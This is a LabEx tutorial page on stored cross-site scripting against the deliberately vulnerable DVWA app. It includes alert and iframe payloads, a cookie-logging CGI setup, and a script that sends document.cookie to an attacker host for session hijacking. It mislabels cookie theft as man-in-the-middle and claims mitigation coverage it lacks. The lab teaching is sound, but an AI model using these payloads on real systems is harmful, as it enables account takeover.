LabEx
Log In Join For Free

🚧 Stored Cross-Site Scripting (XSS) Attack

Beginner

Introduction

In this lab, you will learn about the concept of stored cross-site scripting (XSS) attacks. Cross-Site Scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious code into a web application, which is then executed by the victim's browser. The stored XSS attack is a specific type of XSS where the malicious code is stored on the server and executed every time the page is loaded, potentially affecting all users of the application.

The goal of this lab is to understand how stored XSS attacks work and how to perform them. You will also learn about a specific technique called a man-in-the-middle attack, which can be facilitated by a stored XSS vulnerability.

Understand Stored XSS

In this step, you will learn about the concept of stored XSS and how it differs from reflected XSS.

Reflected XSS, also known as non-persistent XSS, is a type of attack where the malicious code is part of the request sent to the server and is immediately reflected back in the response. This means that the attack only affects the specific user who visits the crafted URL.

On the other hand, stored XSS, also known as persistent XSS, is a type of attack where the malicious code is stored on the server (e.g., in a database, message forum, visitor log, etc.). This means that the malicious code will be executed whenever any user accesses the affected page, making the attack more widespread and potentially affecting all users of the application.

Here's a table to illustrate the differences between reflected XSS and stored XSS:

Characteristic Reflected XSS Stored XSS
URL Special URL with malicious code No special URL
Submission Method GET POST
Code Modification No code modification on the server Code modification on the server
Affected Users Individual users (who visit the crafted URL) All users

Perform a Simple Stored XSS Attack

In this step, you will perform a simple stored XSS attack using the DVWA (Damn Vulnerable Web Application) platform.

  1. Start the vulnerable machine by running the following command in the terminal:
sudo virsh start Metasploitable2

  1. Open the Firefox browser and navigate to http://192.168.122.102.

  2. Log in to the DVWA application using the default credentials (username: admin, password: password).

  3. Set the security level to "low" by going to the "Security" page and selecting the "Low" option.

  4. Go to the "XSS Stored" page, which simulates a guestbook application.

  5. In the "Message" field, enter the following JavaScript code:

<script>
  alert("Hello, Shiyanlou!");
</script>
  1. Click the "Sign Guestbook" button to submit the message.

You should see an alert box pop up with the message "Hello, Shiyanlou!". This indicates that the JavaScript code was successfully executed by the browser.

  1. Refresh the page, and you will see the alert box again. This happens because the malicious code was stored on the server and is executed every time the page is loaded.

Perform a Stored XSS IFRAME Attack

In this step, you will learn about another technique for performing a stored XSS attack using an IFRAME.

  1. Reset the DVWA database by going to the "Setup" page and clicking the "Reset DB" button.

  2. Open a new terminal and start the Apache web server by running the following command:

sudo service apache2 start
  1. In the "XSS Stored" page of DVWA, enter the following code in the "Message" field:
<iframe src="http://localhost"></iframe>
  1. Click the "Sign Guestbook" button to submit the message.

You should see the local Apache server's default page embedded in the DVWA page.

This technique is known as an IFRAME attack, where the attacker injects an IFRAME that loads a malicious website or a phishing site. When a victim visits the affected page, their browser will automatically load the attacker's website within the IFRAME, potentially exposing sensitive information or leading to further attacks.

Perform a Stored XSS Man-in-the-Middle (MITM) Attack

In this step, you will learn how to perform a man-in-the-middle (MITM) attack using a stored XSS vulnerability.

  1. Inside the Kali container, download the provided Perl script for capturing cookies by running the following command:
wget https://labfile.oss-internal.aliyuncs.com/courses/717/logit.pl.TXT
  1. Move the script to the /usr/lib/cgi-bin directory and remove the .TXT extension:
mv logit.pl.TXT /usr/lib/cgi-bin/logit.pl
cd /usr/lib/cgi-bin/
  1. Change the owner and permissions of the script:
chown www-data:www-data logit.pl
chmod 700 logit.pl

  1. Modify the Apache configuration file (/etc/apache2/apache2.conf) to enable the execution of CGI scripts in the /usr/lib/cgi-bin directory.

  2. Create a directory for storing the captured cookies:

mkdir -p /var/www/logdir
chown www-data:www-data /var/www/logdir
chmod 700 /var/www/logdir
  1. Enable the CGI module for Apache by running the following command:
a2enmod cgi
  1. Start the Apache service:
service apache2 start

  1. Verify that the CGI script is working by visiting http://172.17.0.2/cgi-bin/logit.pl in your browser.

  2. In the DVWA "XSS Stored" page, enter the following code in the "Message" field (make sure to increase the character limit if needed):

<script>
  document.location = "http://172.17.0.2/cgi-bin/logit.pl?" + document.cookie;
</script>
  1. Click the "Sign Guestbook" button to submit the message.

You should be redirected to the logit.pl script, which will capture your browser's cookie and store it in the /var/www/logdir/log.txt file.

  1. Install the "Cookie Quick Manager" extension in Firefox and restart the browser.

  2. Open the Cookie Quick Manager extension and replace the PHPSESSID cookie value with the one you captured in the previous step.

  3. Visit http://192.168.122.102/dvwa/index.php, and you should be logged in to the DVWA application without entering any credentials.

This demonstrates a successful man-in-the-middle attack, where the attacker can hijack a user's session and gain unauthorized access to the application by capturing and replaying the user's cookie.

Summary

In this lab, you learned about stored cross-site scripting (XSS) attacks and how they differ from reflected XSS attacks. You performed a simple stored XSS attack, an IFRAME attack, and a man-in-the-middle (MITM) attack using a stored XSS vulnerability. Through hands-on practice, you gained an understanding of how stored XSS can be exploited to execute malicious code on the server and potentially affect all users of a web application. Additionally, you learned how a stored XSS vulnerability can facilitate MITM attacks, allowing an attacker to hijack user sessions and gain unauthorized access to the application.

This lab provided you with practical experience in identifying and exploiting stored XSS vulnerabilities, as well as techniques for mitigating such attacks in real-world scenarios. By understanding the concepts and hands-on experience gained in this lab, you will be better equipped to assess and secure web applications against stored XSS and related attacks.

Other Tutorials you may like

We use cookies for a number of reasons, such as keeping the website reliable and secure, to improve your experience on our website and to see how you interact with it. By accepting, you agree to our use of such cookies. Privacy Policy